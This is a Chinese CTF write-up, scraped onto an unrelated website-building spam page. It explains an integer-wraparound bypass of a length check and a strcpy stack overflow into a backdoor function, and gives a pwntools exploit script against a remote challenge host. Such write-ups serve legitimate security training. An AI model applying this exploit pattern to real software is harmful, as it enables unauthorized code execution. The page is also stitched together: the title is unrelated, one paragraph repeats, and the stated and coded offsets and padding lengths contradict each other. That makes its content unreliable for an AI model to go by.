深圳松岗做网站的dw怎么做网站跳转
2026/4/18 5:38:34 网站建设 项目流程
深圳松岗做网站的,dw怎么做网站跳转,wordpress百度地图主题,网站顾客评价程序创建了一个 in8 类型无符号的 v3 变量#xff0c;之后检查 v3 的长度#xff0c;如果长度在 3-8 之间则打印 success#xff0c;并把变量 s 复制到 dest 变量中#xff0c;这个 srcpy() 就是一个会造成栈溢出的函数#xff0c;因为他在复制时不会考虑长度。但是若 v3 …程序创建了一个 in8 类型无符号的 v3 变量之后检查 v3 的长度如果长度在 3-8 之间则打印 success并把变量 s 复制到 dest 变量中这个 srcpy() 就是一个会造成栈溢出的函数因为他在复制时不会考虑长度。但是若 v3 长度不在 3-8 之间则返回密码无效。程序创建了一个 in8 类型无符号的 v3 变量之后检查 v3 的长度如果长度在 3-8 之间则打印 success并把变量 s 复制到 dest 变量中这个 srcpy() 就是一个会造成栈溢出的函数因为他在复制时不会考虑长度。但是若 v3 长度不在 3-8 之间则返回密码无效。以下参考 1000x_ 师傅的文章无符号 int8 的最大值是 2^8-1255因为多出来的部分在 C/C 代码中会回绕即 256 回绕成 0 257 回绕成 1 以此类推我们需要字符长度到达 3 的话我们传入的大小最小应该为 259。攻击思路首先在choice时选择 1再输入用户名(随便输入)之后再溢出密码区域dest 和 s。查看 dest 的栈它需要溢出 0x144之后让其跳转到 backdoor 函数也就是 what_is_this 函数的内存地址但是想要让复制操作执行首先需要通过前面的 if ( v3 3u || v3 8u ) 语句即让 v3 strlen(s) 的长度保持在 0x04~0x08也就是 buf 的长度要保持在 0x104~0x108。因此除去前面为 buf 构造 payload 所用的 ba * (0x14 - 0x00 0x04) p32(elf.symbols[what_is_this]) 以外还要在后面继续填充垃圾字符让 buf 的长度在 0x104~0x108 之间。expfrom pwn import *from LibcSearcher import *#startr remote(61.147.171.103,59035)elf ELF(./pwn)context.log_level debug#paramsbackdoor_addr elf.symbols[what_is_this]#attackpayload ba*(0x144) p32(backdoor_addr)payload payload.ljust(0x104,ba) #实现在 payload 右边添加 ba 一直将 payload 的长度填充至 0x104r.sendlineafter(bchoice,b1)r.sendlineafter(busername,b111)r.sendlineafter(bpasswd,payload)r.interactive()

需要专业的网站建设服务?

联系我们获取免费的网站建设咨询和方案报价,让我们帮助您实现业务目标

立即咨询